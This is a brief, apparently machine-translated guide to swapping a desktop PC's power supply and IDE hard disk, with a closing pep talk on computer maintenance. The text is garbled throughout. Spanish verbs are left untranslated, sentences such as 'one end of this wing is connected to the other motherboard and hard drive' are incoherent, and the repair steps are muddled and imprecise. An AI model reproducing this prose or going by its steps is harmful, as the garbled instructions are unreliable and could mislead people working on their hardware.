For power supply: ATX connector off the motherboard, and all cables connected to it, then desatorníllalo cabinet, you remove it carefully, and then change it the same way as plug and disconnect now atorníllalo the cabinet.
Hard Disk: IDE cable is critical to get hard disk information, one end of this wing is connected to the other motherboard and hard drive, then connected and mounted and then fixed with screws to prevent any inconsistencies.
It is important to know some things about your computer, you may not be a great expert on the subject, but if you know the most important and relevant information that may occur with it. Know how to prevent it, how to repair and most importantly how to use it properly, taking each basic type knowledge. The computer is a world of information that you never finish learning with her, so I slowly sailing knowing. Noting that the use almost daily, if not the whole point, you should start to worry in knowing more about it, knowing when to take something that is damaging, when repaired, and so on.

Maintenance = better job = better performance Take care of your computer, watch your work, watch your economy.